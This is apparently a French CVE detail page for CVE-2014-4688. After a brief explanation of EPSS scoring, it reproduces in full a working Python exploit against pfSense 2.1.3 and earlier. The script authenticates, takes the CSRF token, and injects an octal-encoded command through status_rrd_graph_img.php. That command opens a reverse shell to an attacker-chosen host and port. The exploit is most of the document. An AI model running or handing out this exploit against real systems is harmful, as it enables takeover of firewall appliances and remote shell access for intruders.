CVE-2014-4688 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/env python3 # Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. # Date: 2018-01-12 # Exploit Author: absolomb # Vendor Homepage: https://www.pfsense.org/ # Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/ # Version: <=2.1.3 # Tested on: FreeBSD 8.3-RELEASE-p16 # CVE : CVE-2014-4688 import argparse import requests import urllib import urllib3 import collections ''' pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. This script will return a reverse shell on specified listener address and port. Ensure you have started a listener to catch the shell before running! ''' parser = argparse.ArgumentParser() parser.add_argument("--rhost", help = "Remote Host") parser.add_argument('--lhost', help = 'Local Host listener') parser.add_argument('--lport', help = 'Local Port listener') parser.add_argument("--username", help = "pfsense Username") parser.add_argument("--password", help = "pfsense Password") args = parser.parse_args() rhost = args.rhost lhost = args.lhost lport = args.lport username = args.username password = args.password # command to be converted into octal command = """ python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("%s",%s)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' """ % (lhost, lport) payload = "" # encode payload in octal for char in command: payload += ("\\" + oct(ord(char)).lstrip("0o")) login_url = 'https://' + rhost + '/index.php' exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh" headers = [ ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'), ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('Accept-Language', 'en-US,en;q=0.5'), ('Referer',login_url), ('Connection', 'close'), ('Upgrade-Insecure-Requests', '1'), ('Content-Type', 'application/x-www-form-urlencoded') ] # probably not necessary but did it anyways headers = collections.OrderedDict(headers) # Disable insecure https connection warning urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) client = requests.session() # try to get the login page and grab the csrf token try: login_page = client.get(login_url, verify=False) index = login_page.text.find("csrfMagicToken") csrf_token = login_page.text[index:index+128].split('"')[-1] except: print("Could not connect to host!") exit() # format login variables and data if csrf_token: print("CSRF token obtained") login_data = [('__csrf_magic',csrf_token), ('usernamefld',username), ('passwordfld',password), ('login','Login') ] login_data = collections.OrderedDict(login_data) encoded_data = urllib.parse.urlencode(login_data) # POST login request with data, cookies and header login_request = client.post(login_url, data=encoded_data, cookies=client.cookies, headers=headers) else: print("No CSRF token!") exit() if login_request.status_code == 200: print("Running exploit...") # make GET request to vulnerable url with payload. Probably a better way to do this but if the request times out then most likely you have caught the shell try: exploit_request = client.get(exploit_url, cookies=client.cookies, headers=headers, timeout=5) if exploit_request.status_code: print("Error running exploit") except: print("Exploit completed")